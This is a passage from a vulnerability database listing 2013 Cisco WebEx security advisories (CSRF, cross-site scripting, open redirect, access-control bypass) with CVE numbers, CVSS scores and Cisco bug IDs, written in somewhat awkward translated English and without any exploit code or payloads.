Successfully exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks.
These issues are being tracked by Cisco bug ID CSCul57111. The program provides a wealth of tools for online classrooms, online training, and online exams
| VAR-201312-0458 | CVE-2013-6710 | Cisco WebEx Training Center Vulnerable to cross-site request forgery |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in Cisco WebEx Training Center allows remote attackers to hijack the authentication of unspecified victims via unknown vectors, aka Bug ID CSCul25567. Vendors have confirmed this vulnerability Bug ID CSCul25567 It is released as.Authentication may be hijacked by a third party.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
This issue is being tracked by Cisco Bug ID CSCul25567. Cisco WebEx Training Center is an e-learning solution in a set of WebEx meeting solutions of Cisco (Cisco). The program provides a wealth of tools for online classrooms, online training, and online exams
| VAR-201312-0459 | CVE-2013-6711 | Cisco WebEx Sales Center Cross-site scripting vulnerability in the product creation management page |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the product-creation administrative page in Cisco WebEx Sales Center allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCul25540. Cisco WebEx Sales Center Product creation (product-creation) Contains a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCul25540. The solution supports the creation of personalized sales processes, online presentations, sales tracking and reporting, and more
| VAR-201312-0248 | CVE-2013-6959 | Cisco WebEx Sales Center Open redirect vulnerability |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
Open redirect vulnerability in Cisco WebEx Sales Center allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, aka Bug ID CSCul25557.
An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
This issue is being tracked by Cisco Bug ID CSCul25557. The solution supports the creation of personalized sales processes, online presentations, sales tracking and reporting, and more
| VAR-201312-0249 | CVE-2013-6960 | Cisco WebEx Meeting Center Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Cisco WebEx Meeting Center allow remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCul36248. Cisco WebEx Meeting Center Contains a cross-site scripting vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCul36248. The product invites others to join the meeting via email or instant messaging (IM), enabling online product demonstrations, information sharing, and more
| VAR-201312-0250 | CVE-2013-6961 | Cisco WebEx Meeting Center of Collaboration Partner Access Console Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the Collaboration Partner Access Console (CPAC) in Cisco WebEx Meeting Center allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCul36237.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCul36237. Cisco WebEx Meeting Center is an online meeting product in a set of WebEx meeting solutions of Cisco (Cisco). The product invites others to join the meeting via email or instant messaging (IM), enabling online product demonstrations, information sharing, and more
| VAR-201312-0251 | CVE-2013-6962 | Cisco WebEx Meeting Center Mobile browser subsystem vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the mobile-browser subsystem in Cisco WebEx Meeting Center allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCul36228.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCul36228. Cisco WebEx Meeting Center is an online meeting product in a set of WebEx meeting solutions of Cisco (Cisco). The product invites others to join the meeting via email or instant messaging (IM), enabling online product demonstrations, information sharing, and more
| VAR-201312-0252 | CVE-2013-6963 | Cisco WebEx Training Center Cross-site scripting vulnerability in the registration component |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the registration component in Cisco WebEx Training Center allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCul36207.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCul36207. Cisco WebEx Training Center is an e-learning solution in a set of WebEx meeting solutions of Cisco (Cisco). The program provides a wealth of tools for online classrooms, online training, and online exams. The vulnerability is caused by the page not adequately filtering the input submitted by the user
| VAR-201312-0253 | CVE-2013-6964 | Cisco WebEx Meeting Center Vulnerability that bypasses access control |
CVSS V2: 3.5 CVSS V3: - Severity: LOW |
Cisco WebEx Meeting Center allows remote authenticated users to bypass access control and inject content from a different WebEx site via unspecified vectors, aka Bug ID CSCul36197. Cisco WebEx Meeting Center is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks.
This issue is tracked by Cisco Bug ID CSCul36197. The product invites others to join the meeting via email or instant messaging (IM), enabling online product demonstrations, information sharing, and more